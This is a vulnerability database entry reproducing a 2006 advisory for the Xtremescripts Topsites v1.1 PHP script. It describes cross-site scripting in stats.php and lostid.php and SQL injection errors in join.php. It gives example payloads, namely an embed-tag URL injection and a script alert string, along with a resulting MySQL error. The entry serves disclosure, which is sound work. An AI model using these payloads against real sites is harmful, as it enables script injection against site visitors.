Xtremescripts Topsites v1.1

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053233 漏洞类型
发布时间 2006-05-25 更新时间 2006-05-25
CVE编号 CVE-2006-2545
CVE-2006-2543
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050139
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Xtremescripts Topsites v1.1

Homepage:

http://www.xtremescripts.com/topsites.php

Description:

Xtreme Topsites is a popular topsite PHP script for websites. Most commonly

used across anime websites at the moment. The topsite will count hits/clicks

in and hits out and will rank them on total hits so that the site with the most

hits will be number 1.

Effected files:

stats.php

join.php

lostid.php

Exploit:

stats.php allows embedded objects which in turn can cause a XSS.

example:

http://www.example.com/xtremets/stats.php?id=1 <embed allowScriptAccess="never"src="harmfulflash.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="

0" height="0"></embed>

lostid.php input data isn't properally sanatized & filtered which allows for XSS

example:

put in box: <script>alert('hi')</script>

Input data on join.php isn't sanatized and can create mysql errors if users input malicious data.

example:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right

syntax to use near 'hi'','9cdfb439c7876e703e307864c9167a15','0','19052006','-')' at line 2